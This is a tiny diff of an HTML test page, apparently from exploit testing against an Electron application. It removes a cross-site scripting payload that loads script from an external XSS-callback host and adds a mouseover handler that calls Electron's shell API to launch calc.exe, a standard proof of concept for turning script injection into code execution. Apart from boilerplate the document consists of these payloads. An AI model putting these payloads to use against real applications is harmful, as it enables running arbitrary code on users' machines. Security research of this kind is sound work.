--- a/1.html
+++ b/1.html
@@ -2,7 +2,7 @@
 <!DOCTYPE html>
 <html>
 <body>
-"><script src=https://gr0.xss.ht></script>
+<a onmouseover="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">
 <h1>My First Heading</h1>
 <p>My first paragraph.</p>
 
